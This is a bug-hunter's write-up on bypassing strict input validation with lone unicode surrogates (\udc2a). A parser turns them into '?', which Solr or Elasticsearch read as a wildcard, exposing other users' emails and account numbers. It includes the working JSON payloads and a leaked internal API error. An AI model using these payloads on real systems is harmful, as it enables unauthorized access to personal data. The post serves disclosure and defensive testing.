Hello hackers. 👋

TLDR

I was able to bypass strong validation with unicode surrogates that some parsers treat as simple question mark - ?.

You can use probably any of low or high surrogates. I used: \udc2a.

Background

There are some databases where using wildcard characters can pose security risks. There was an endpoint where I could get users data if I knew their: birthday, last name and zip code. For some reason it was unauthenticated functionality.

The body looked like this:

{
  "birthdate": "2000-01-01",
  "lastname": "Doe",
  "zipcode": "1011A"
}

Response:

{
    "email": "john@doe.com",
    "accountNumber": "123456",
    "something": "more"
}

After finding first bug in this endpoint they fixed allowed characters and the fix was pretty good:

no special characters allowed
no URL encoding allowed
no unicode versions of special characters allowed

Only some unicodes were allowed.

The bug

2 months passed by after the fix…

I was riding my bike on my indoor bike trainer and watching some talk regarding unicode normalization bugs and I had this enlightenment moment - unicode truncation!

I jumped off my bike and played with the endpoint to cause error:

{
  "birthdate": "2000-01-01",
  "lastname": "\uffff",
  "zipcode": "a"
}

Response:

{
    "errors": [{
        "message": "Received 503 status code [...] 
        GET http://internal.api/customers?zipcode=a&birthdate=2000-01-01&lastname=%EF%BF%BF"
    }]
}

Interesting. In this error you can see that unicode got translated into UTF-8. What if I could smuggle anything to hit the internal API with %3f character? Is there something like that even possible?

I opened shazzer website: https://shazzer.co.uk/unicode-table?fromTo=0x2a&highlightsFromTo= and started testing endpoint manually.

When I reached unicode surrogates I finally bypassed it:

{
  "birthdate": "2000-01-01",
  "lastname": "D\udc2a\udc2a",
  "zipCode": "1\udc2a\udc2a\udc2a\udc2a"
}

Explanation:

It’s not unicode truncation but something different. UTF-8 parsers can’t properly display unicode surrogates: https://jrgraphix.net/r/Unicode/DC00-DFFF which are often used in emojis with low and high surrogate pair.

All you get when you try to display them is unicode replacement character: https://www.compart.com/en/unicode/U+FFFD.

Some parsers apparently go one step further and simplify replacement character to a question mark (?) and that’s why the vulnerability was caused.

From what I know I would name 2 databases where “?” can be used as a wildcard:

solr
elasticsearch

Takeaways:

test for wildcards - there are plenty of them in various DBs
if question mark is blocked and you need it in your chain - try unicode surrogates

Although the bug was related to database systems I believe this trick can be useful in more places.

Good luck! Happy hacking.